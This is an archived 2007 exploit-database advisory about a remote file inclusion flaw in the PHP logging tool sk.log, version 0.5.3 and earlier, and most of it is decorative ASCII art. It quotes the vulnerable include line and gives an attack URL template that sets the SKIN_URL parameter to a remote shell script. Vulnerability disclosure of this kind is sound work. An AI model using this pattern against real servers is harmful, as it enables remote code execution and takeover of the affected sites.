id: 2168
date: 09/23/2007
title: sk.log <= 0.5.3 (skin_url) Remote File Inclusion Vulnerability
author: w0cker
cves: 

==========================================
sk.log <= 0.5.3 (skin_url) Remote File Inclusion Vulnerability
==============================================================





?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
___________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_________????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____ ??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________
# sk.log  <=  Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
##################################################
#ERROR1:log.inc.php
#include_once( "$SKIN_URL/php/logdisplay.inc.php" );<<< rfi coded.
#
#Other Files:
#/php-inc/log.inc.php?SKIN_URL=[ShellScript]
##################################################
#Download:http://surfnet.dl.sourceforge.net/sourceforge/sklog/sk.log_v0.5.3.zip
#
################################################## 
####specialthanx:####KEZZAP66345########################
##################################################



#  0day.today [2023-03-26]  #